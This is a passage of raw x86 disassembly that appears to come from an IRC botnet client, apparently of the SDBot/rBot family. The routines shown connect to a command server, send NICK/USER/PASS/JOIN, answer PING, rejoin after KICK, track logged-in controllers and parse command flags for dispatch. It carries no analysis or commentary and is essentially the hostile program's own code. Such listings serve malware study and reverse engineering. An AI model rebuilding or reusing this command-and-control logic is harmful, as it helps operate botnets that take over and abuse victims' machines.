var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_414630
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_408620: ; CODE XREF: sub_408601+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_408620
cmp byte_47BF20, 0
jz short loc_408649
push offset byte_47BF20
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_405674
add esp, 0Ch
loc_408649: ; CODE XREF: sub_408601+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_40FC7C
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_414415
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_408677: ; CODE XREF: sub_408601+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408677
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4086AF
push [ebp+58h+arg_0]
call dword_435914 ; closesocket
push 7D0h
call ds:dword_420000 ; Sleep
xor eax, eax
jmp loc_408876
; ---------------------------------------------------------------------------
loc_4086AF: ; CODE XREF: sub_408601+91�j
push edi
jmp loc_40883C
; ---------------------------------------------------------------------------
loc_4086B5: ; CODE XREF: sub_408601+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_40672D
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_40883C
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_4086E1: ; CODE XREF: sub_408601+235�j
push offset asc_425A50 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_414EE0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_40870B
add [ebp+58h+var_4], 2
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_40870B: ; CODE XREF: sub_408601+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_408710: ; CODE XREF: sub_408601+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_4144A0
lea eax, [ebp+58h+var_2AC]
push offset asc_425A4C ; "|"
push eax
call sub_415289
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_408825
loc_408749: ; CODE XREF: sub_408601+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_4144A0
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_408775: ; CODE XREF: sub_408601+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408775
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_408785: ; CODE XREF: sub_408601+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_408785
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4087A1: ; CODE XREF: sub_408601+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4087A1
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_425A4C ; "|"
push ebx
call sub_415289
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4087C1: ; CODE XREF: sub_408601+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_4089DC
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_408809
push 0FAh
call ds:dword_420000 ; Sleep
jmp short loc_4087C1
; ---------------------------------------------------------------------------
loc_408809: ; CODE XREF: sub_408601+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_408872
cmp esi, 0FFFFFFFEh
jz short loc_40886D
cmp esi, 0FFFFFFFFh
jz short loc_408869
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_408749
loc_408825: ; CODE XREF: sub_408601+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_4086E1
loc_40883C: ; CODE XREF: sub_408601+AF�j
; sub_408601+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_43577C ; recv
test eax, eax
jg loc_4086B5
loc_408869: ; CODE XREF: sub_408601+215�j
xor eax, eax
jmp short loc_408875
; ---------------------------------------------------------------------------
loc_40886D: ; CODE XREF: sub_408601+210�j
xor eax, eax
inc eax
jmp short loc_408875
; ---------------------------------------------------------------------------
loc_408872: ; CODE XREF: sub_408601+20B�j
push 2
pop eax
loc_408875: ; CODE XREF: sub_408601+26A�j
; sub_408601+26F�j
pop edi
loc_408876: ; CODE XREF: sub_408601+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_408601 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40887D proc near ; CODE XREF: sub_40E6BB+472�p
; DATA XREF: sub_4089DC+2BF8�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_408978
; ---------------------------------------------------------------------------
loc_4088A7: ; CODE XREF: sub_40887D+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42BEDC
lea edi, [ebp+var_2C]
push dword_42BED8
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_40FC7C
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_4366B8
push edi
push eax
call sub_4144A0
add esp, 1Ch
push 6
push ebx
push 2
call dword_435808 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_4366AC[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_4089AE
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401F73
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_408601
add esp, 28h
push esi
mov edi, eax
call dword_435914 ; closesocket
test edi, edi
jz short loc_408978
cmp edi, ebx
jnz short loc_408973
push 1D4C0h
call ds:dword_420000 ; Sleep
jmp short loc_408978
; ---------------------------------------------------------------------------
loc_408973: ; CODE XREF: sub_40887D+E7�j
cmp edi, 2
jz short loc_4089C9
loc_408978: ; CODE XREF: sub_40887D+25�j
; sub_40887D+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_435954 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_407BFF
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4088A7
jmp short loc_4089D5
; ---------------------------------------------------------------------------
loc_4089AE: ; CODE XREF: sub_40887D+92�j
push esi
call dword_435914 ; closesocket
call sub_407C28
push 7D0h
call ds:dword_420000 ; Sleep
mov eax, ebx
jmp short loc_4089D5
; ---------------------------------------------------------------------------
loc_4089C9: ; CODE XREF: sub_40887D+F9�j
push [ebp+var_34]
call sub_41255E
pop ecx
push 2
pop eax
loc_4089D5: ; CODE XREF: sub_40887D+12F�j
; sub_40887D+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40887D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089DC proc near ; CODE XREF: sub_408601+1EC�p
var_2800 = byte ptr -2800h
var_2400 = byte ptr -2400h
var_2270 = byte ptr -2270h
var_2070 = byte ptr -2070h
var_1F70 = byte ptr -1F70h
var_1D70 = byte ptr -1D70h
var_1C70 = byte ptr -1C70h
var_1C6C = byte ptr -1C6Ch
var_1B6C = dword ptr -1B6Ch
var_1B68 = dword ptr -1B68h
var_1B64 = byte ptr -1B64h
var_1AE4 = byte ptr -1AE4h
var_1A64 = byte ptr -1A64h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_18E4 = dword ptr -18E4h
var_18E0 = dword ptr -18E0h
var_18DC = dword ptr -18DCh
var_18D8 = dword ptr -18D8h
var_18D4 = byte ptr -18D4h
var_1854 = byte ptr -1854h
var_17D4 = byte ptr -17D4h
var_1754 = byte ptr -1754h
var_16D4 = dword ptr -16D4h
var_16D0 = dword ptr -16D0h
var_16CC = dword ptr -16CCh
var_16C8 = dword ptr -16C8h
var_16C4 = byte ptr -16C4h
var_16C0 = byte ptr -16C0h
var_15C0 = byte ptr -15C0h
var_15BC = byte ptr -15BCh
var_153C = byte ptr -153Ch
var_14FC = byte ptr -14FCh
var_146C = dword ptr -146Ch
var_1468 = dword ptr -1468h
var_1464 = dword ptr -1464h
var_1460 = dword ptr -1460h
var_145C = dword ptr -145Ch
var_1458 = byte ptr -1458h
var_1454 = dword ptr -1454h
var_1450 = byte ptr -1450h
var_13D0 = byte ptr -13D0h
var_1354 = byte ptr -1354h
var_12CC = byte ptr -12CCh
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = byte ptr -1244h
var_11C8 = dword ptr -11C8h
var_11C4 = dword ptr -11C4h
var_11C0 = dword ptr -11C0h
var_11BC = dword ptr -11BCh
var_11B8 = dword ptr -11B8h
var_11B4 = byte ptr -11B4h
var_1134 = byte ptr -1134h
var_10B4 = byte ptr -10B4h
var_1034 = dword ptr -1034h
var_1030 = dword ptr -1030h
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1010 = byte ptr -1010h
var_F90 = byte ptr -0F90h
var_F10 = dword ptr -0F10h
var_F0C = dword ptr -0F0Ch
var_F08 = dword ptr -0F08h
var_F00 = dword ptr -0F00h
var_EFC = dword ptr -0EFCh
var_EF8 = dword ptr -0EF8h
var_EF0 = dword ptr -0EF0h
var_EEC = byte ptr -0EECh
var_EB0 = dword ptr -0EB0h
var_EAC = byte ptr -0EACh
var_E6C = byte ptr -0E6Ch
var_E2C = byte ptr -0E2Ch
var_DAC = byte ptr -0DACh
var_D2C = dword ptr -0D2Ch
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = dword ptr -0D18h
var_D14 = dword ptr -0D14h
var_D10 = dword ptr -0D10h
var_D0C = byte ptr -0D0Ch
var_D08 = dword ptr -0D08h
var_D04 = byte ptr -0D04h
var_C84 = byte ptr -0C84h
var_B84 = byte ptr -0B84h
var_A85 = byte ptr -0A85h
var_A84 = byte ptr -0A84h
var_984 = dword ptr -984h
var_980 = dword ptr -980h
var_97C = dword ptr -97Ch
var_978 = dword ptr -978h
var_974 = dword ptr -974h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_964 = dword ptr -964h
var_960 = byte ptr -960h
var_8E0 = dword ptr -8E0h
var_8DC = byte ptr -8DCh
var_8D0 = byte ptr -8D0h
var_8CC = byte ptr -8CCh
var_85C = byte ptr -85Ch
var_7DC = dword ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
var_7C0 = byte ptr -7C0h
var_7B0 = dword ptr -7B0h
var_7AC = byte ptr -7ACh
var_72C = byte ptr -72Ch
var_6AC = dword ptr -6ACh
var_6A8 = dword ptr -6A8h
var_6A4 = dword ptr -6A4h
var_6A0 = dword ptr -6A0h
var_69C = dword ptr -69Ch
var_698 = dword ptr -698h
var_694 = dword ptr -694h
var_690 = dword ptr -690h
var_68C = byte ptr -68Ch
var_67C = byte ptr -67Ch
var_5FC = dword ptr -5FCh
var_5F8 = byte ptr -5F8h
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D0 = dword ptr -4D0h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4BC = byte ptr -4BCh
var_45B = byte ptr -45Bh
var_45A = byte ptr -45Ah
var_458 = byte ptr -458h
var_457 = byte ptr -457h
var_454 = dword ptr -454h
var_450 = byte ptr -450h
var_44E = byte ptr -44Eh
var_44C = byte ptr -44Ch
var_44B = byte ptr -44Bh
var_44A = byte ptr -44Ah
var_449 = byte ptr -449h
var_442 = byte ptr -442h
var_420 = byte ptr -420h
var_400 = dword ptr -400h
var_3D4 = dword ptr -3D4h
var_3D0 = dword ptr -3D0h
var_3CC = dword ptr -3CCh
var_3C8 = dword ptr -3C8h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_3A0 = dword ptr -3A0h
var_39C = byte ptr -39Ch
var_398 = dword ptr -398h
var_394 = byte ptr -394h
var_388 = dword ptr -388h
var_384 = byte ptr -384h
var_31C = byte ptr -31Ch
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = dword ptr -0D4h
var_C8 = byte ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_68 = byte ptr -68h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2800h
call sub_414630
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2F0]
rep stosd
lea eax, [ebp+var_3BC]
push eax
mov [ebp+var_20], 3
mov [ebp+var_1C], ebx
mov [ebp+var_18], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_4144A0
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_408C5C
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_1F70]
rep stosd
lea eax, [ebp+var_1F70]
push eax
call sub_4144A0
lea eax, [ebp+var_1F70]
push offset asc_425A50 ; " :"
push eax
call sub_414EE0
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_1F70]
push eax
lea eax, [ebp+var_2270]
push eax
call sub_4144A0
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_2270]
push esi
push eax
call sub_415289
xor edi, edi
add esp, 28h
mov [ebp+var_A8], eax
inc edi
loc_408A99: ; CODE XREF: sub_4089DC+D1�j
push esi
push ebx
call sub_415289
mov [ebp+edi*4+var_A8], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_408A99
mov ebx, [ebp+var_A8]
xor esi, esi
cmp ebx, esi
jz loc_408C5A
cmp [ebp+var_A4], esi
jz loc_408C5A
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_4BC]
push 1Fh
rep stosd
pop edx
loc_408ADB: ; CODE XREF: sub_4089DC+137�j
lea ecx, [ebp+edx*4+var_A8]
mov eax, [ecx]
cmp eax, esi
jz short loc_408B12
cmp byte ptr [eax], 2Dh
jnz short loc_408B15
cmp byte ptr [eax+2], 0
jnz short loc_408B15
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A8]
mov [ebp+edi+var_4BC], 1
loc_408B12: ; CODE XREF: sub_4089DC+10A�j
dec edx
jns short loc_408ADB
loc_408B15: ; CODE XREF: sub_4089DC+10F�j
; sub_4089DC+115�j
cmp [ebp+var_449], 0
jz short loc_408B25
mov [ebp+var_C], 1
loc_408B25: ; CODE XREF: sub_4089DC+140�j
cmp [ebp+var_44E], 0
jz short loc_408B38
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_408B38: ; CODE XREF: sub_4089DC+150�j
cmp byte ptr [ebx], 0Ah
jz short loc_408B72
push 7Fh
lea eax, [ebp+var_960]
push ebx
push eax
call sub_4144A0
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_F0]
push eax
call sub_4144A0
lea eax, [ebp+var_F0]
push offset asc_427A0C ; "!"
push eax
call sub_415289
add esp, 20h
loc_408B72: ; CODE XREF: sub_4089DC+15F�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_408BC0
push [ebp+var_A4]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_405674
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_408C5A
loc_408BA8: ; CODE XREF: sub_4089DC+3D7�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_408BB3: ; CODE XREF: sub_4089DC+6D3�j
; sub_4089DC+936�j ...
push [ebp+arg_4]
call sub_405674
jmp loc_40D32C
; ---------------------------------------------------------------------------
loc_408BC0: ; CODE XREF: sub_4089DC+1A4�j
mov edx, [ebp+var_A4]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40E673
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40E673
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_408C23
push offset a@ ; "@"
push [ebp+var_9C]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_408C5A
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_408EC8
; ---------------------------------------------------------------------------
loc_408C23: ; CODE XREF: sub_4089DC+220�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_408C62
push eax
push dword_42BEDC
push dword_42BED8
push [ebp+arg_10]
call sub_40FC7C
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405674
add esp, 1Ch
loc_408C5A: ; CODE XREF: sub_4089DC+DD�j
; sub_4089DC+E9�j ...
xor eax, eax
loc_408C5C: ; CODE XREF: sub_4089DC+52�j
inc eax
loc_408C5D: ; CODE XREF: sub_4089DC+171A�j
; sub_4089DC+31DA�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408C62: ; CODE XREF: sub_4089DC+254�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_408C68: ; CODE XREF: sub_4089DC+2CD�j
lea eax, [ebp+var_960]
mov esi, edi
loc_408C70: ; CODE XREF: sub_4089DC+2B0�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_408C92
test cl, cl
jz short loc_408C8E
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_408C92
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_408C70
loc_408C8E: ; CODE XREF: sub_4089DC+29E�j
xor eax, eax
jmp short loc_408C97
; ---------------------------------------------------------------------------
loc_408C92: ; CODE XREF: sub_4089DC+29A�j
; sub_4089DC+2A8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408C97: ; CODE XREF: sub_4089DC+2B4�j
test eax, eax
jnz short loc_408CA2
mov [ebp+var_18], 1
loc_408CA2: ; CODE XREF: sub_4089DC+2BD�j
add edi, 80h
dec edx
jnz short loc_408C68
mov edi, [ebp+var_A4]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408DB8
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_408CC9: ; CODE XREF: sub_4089DC+393�j
cmp byte ptr [edi], 0
jz loc_408D68
push 7Fh
lea eax, [ebp+var_960]
push edi
push eax
call sub_4144A0
add esp, 0Ch
cmp [ebp+var_9C], 0
jz short loc_408D68
mov esi, [ebp+var_9C]
lea eax, [ebp+var_F0]
loc_408CF9: ; CODE XREF: sub_4089DC+339�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408D1B
test cl, cl
jz short loc_408D17
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408D1B
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408CF9
loc_408D17: ; CODE XREF: sub_4089DC+327�j
xor eax, eax
jmp short loc_408D20
; ---------------------------------------------------------------------------
loc_408D1B: ; CODE XREF: sub_4089DC+323�j
; sub_4089DC+331�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408D20: ; CODE XREF: sub_4089DC+33D�j
test eax, eax
jnz short loc_408D68
and [edi], al
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_414415
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_405674
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
add esp, 20h
loc_408D68: ; CODE XREF: sub_4089DC+2F0�j
; sub_4089DC+30F�j ...
add edi, 80h
dec ebx
jnz loc_408CC9
mov esi, [ebp+var_9C]
mov eax, [ebp+arg_10]
loc_408D7E: ; CODE XREF: sub_4089DC+3BE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408DA0
test cl, cl
jz short loc_408D9C
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408DA0
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408D7E
loc_408D9C: ; CODE XREF: sub_4089DC+3AC�j
xor eax, eax
jmp short loc_408DA5
; ---------------------------------------------------------------------------
loc_408DA0: ; CODE XREF: sub_4089DC+3A8�j
; sub_4089DC+3B6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408DA5: ; CODE XREF: sub_4089DC+3C2�j
test eax, eax
jnz loc_408C5A
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_408BA8
; ---------------------------------------------------------------------------
loc_408DB8: ; CODE XREF: sub_4089DC+2E1�j
mov edi, [ebp+var_A4]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408F98
mov eax, [ebp+var_A0]
or [ebp+var_18], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_18], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_408DEB: ; CODE XREF: sub_4089DC+4A0�j
lea eax, [ebp+var_960]
mov esi, ebx
loc_408DF3: ; CODE XREF: sub_4089DC+433�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_408E15
test cl, cl
jz short loc_408E11
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_408E15
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_408DF3
loc_408E11: ; CODE XREF: sub_4089DC+421�j
xor eax, eax
jmp short loc_408E1A
; ---------------------------------------------------------------------------
loc_408E15: ; CODE XREF: sub_4089DC+41D�j
; sub_4089DC+42B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408E1A: ; CODE XREF: sub_4089DC+437�j
test eax, eax
jnz short loc_408E73
lea eax, [ebp+var_960]
push 21h
push eax
call sub_4158C0
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_408E73
mov eax, [ebp+var_18]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_408E43: ; CODE XREF: sub_4089DC+46F�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_408E43
mov eax, edi
mov esi, edi
loc_408E51: ; CODE XREF: sub_4089DC+47A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408E51
sub eax, esi
dec ecx
loc_408E5B: ; CODE XREF: sub_4089DC+485�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_408E5B
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_408E73: ; CODE XREF: sub_4089DC+440�j
; sub_4089DC+456�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_408DEB
cmp [ebp+arg_0], 0
jz loc_408C5A
mov esi, [ebp+arg_10]
lea eax, [ebp+var_F0]
loc_408E95: ; CODE XREF: sub_4089DC+4D5�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_408EB7
test cl, cl
jz short loc_408EB3
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_408EB7
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_408E95
loc_408EB3: ; CODE XREF: sub_4089DC+4C3�j
xor eax, eax
jmp short loc_408EBC
; ---------------------------------------------------------------------------
loc_408EB7: ; CODE XREF: sub_4089DC+4BF�j
; sub_4089DC+4CD�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408EBC: ; CODE XREF: sub_4089DC+4D9�j
test eax, eax
jnz short loc_408ED5
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_408EC8: ; CODE XREF: sub_4089DC+242�j
call sub_4144A0
add esp, 0Ch
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_408ED5: ; CODE XREF: sub_4089DC+4E2�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_408EDA: ; CODE XREF: sub_4089DC+540�j
cmp byte ptr [edx], 0
jz short loc_408F12
lea eax, [ebp+var_960]
mov esi, edx
loc_408EE7: ; CODE XREF: sub_4089DC+527�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_408F09
test cl, cl
jz short loc_408F05
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_408F09
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_408EE7
